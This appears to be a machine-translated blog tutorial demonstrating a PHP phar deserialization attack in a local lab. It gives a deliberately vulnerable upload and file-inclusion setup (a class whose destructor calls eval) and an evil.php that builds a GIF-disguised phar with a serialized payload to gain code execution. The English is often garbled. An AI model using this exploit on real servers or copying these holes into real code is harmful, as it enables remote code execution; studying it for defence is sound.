Such a problem also write a lot, and are ignorant of each encounter, I saw an article today Demo relatively simple so that I can let my understanding about the process, write down the record about.
phar deserialization is generated since a part php file phar and controlled by a sequence of storage, and the file using file_get_content () function and the like with phar: file phar be deserialized when // include file protocol. We can write some code where magic method, automatically call the magic method when deserializing, so as to achieve the purpose of the attack.
Some use this condition:
- phar file you want to upload to the server.
- Magic methods must be available as a "springboard."
- Controllable parameter file manipulation functions, and:, /, phar and other special characters are not filtered.
I found a small Demo in an article, just use some of the methods used to demonstrate.
Before we begin, we need this machine in php.ini, modify the following options, otherwise it will not be created Phar file.
Prepare three documents in the drone attack inside, namely: upload.html(spreadsheet upload file)
<html>
<head>
<title>phar_test</title>
</head>
<body>
<form action="upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" />
<input class="button" type="submit" name="submit" value="submit"/>
</form>
</body>
</html>
upload.php(Processing upload files)
<?php
$Upload_dir = "../upload_file/";//上传文件存放处
if(isset($_POST['submit']))
{
if (($_FILES["file"]["type"]=="image/gif")&&(substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1))== 'gif')//判断文件类型
{
echo "Upload: " . $_FILES["file"]["name"]."<br>";
echo "Type: " . $_FILES["file"]["type"]."<br>";
if (file_exists($Upload_dir))//判断文件夹是否存在
{
echo "Can't find the folder to save the file,please create a folder";
}
else
{
move_uploaded_file($_FILES["file"]["tmp_name"],$Upload_dir .$_FILES["file"]["name"]);
echo "Stored in: " . $Upload_dir . $_FILES["file"]["name"]."<br>";
}
}
else
{
echo "Invalid file,you can only upload gif";
}
}
?>
file_un.php(File contains)
<?php
$filename=$_GET['filename'];
class AnyClass{
var $output = 'echo "cck<br>";';
function __destruct()
{
eval($this -> output);
}
}
$a = new Anyclass();
$b = serialize($a);
echo 'normal unserialize:<br>';
unserialize($b);//演示正常反序列化的输出
echo 'GET the $filename';
file_exists($filename);
?>
And a privilege to 777 folders upload_file(used to store uploaded files). Upload.php which requires only upload gif file.
After you are finished, you can begin to experiment.
First, write a evil.php used to create phar file
<?php
class AnyClass{
var $output = 'echo "cck";';
function __destruct()
{
eval($this -> output);
}
}
$phar = new Phar('phar.phar');//创建一个phar.phar文件
$phar -> stopBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');//设置phar文件的Stub部分
$phar -> addFromString('test.txt','test');//添加test.txt文件进入phar文件
$object = new AnyClass();
$object -> output= 'phpinfo();';
$phar -> setMetadata($object);//设置Metadata
$phar -> stopBuffering();
?>
It should explain the nature of the phar file as a compressed file, usually it has four parts:
- stub part, phar: // protocol to identify phar file needs to recognize that part of the form:
xxx<?php xxx; __HALT_COMPILER();?>in front of the content does not matter, but it must require__HALT_COMPILER();?>the end, otherwise it does not recognize. - manifest section, attributes used to describe file permissions and so on, and because the serialization will store user-defined
Metadatadata, but also our mainly local attacks. - The contents of compressed files.
- Signature, optional, usually at the end of the file.
We run evil.php ASCII file created by the phar.phar file is:
you can see, there is a file header GIF98aand phar: // file can be identified to head phar file, we will change it as long as you can about the suffix over restrictions on the gif file type does not allow file phar failure, after the effect of the uploaded figure:
outputthe value becomes "phpinfo();", it will become magic when you call the function eval(phpinfo();), so as to achieve the purpose of implementation of the order. Call magic function requires deserialization, deserialization need to use include()other functions with phar: // protocol read phar file. Then we need to use the file_un.phpfiles included, the effect is shown:
At this point, we have successfully carried out the attack to achieve our goal.
Ordinary file contains:
![! [Insert Picture description here] (https://img-blog.csdnimg.cn/20200313000350836.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl8](https://img-blog.csdnimg.cn/20200313000445751.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDM3Nzk0MA==,size_16,color_FFFFFF,t_70)
a reference article https://www.freebuf.com/articles/web/205943.html
https://paper.seebug.org/680/
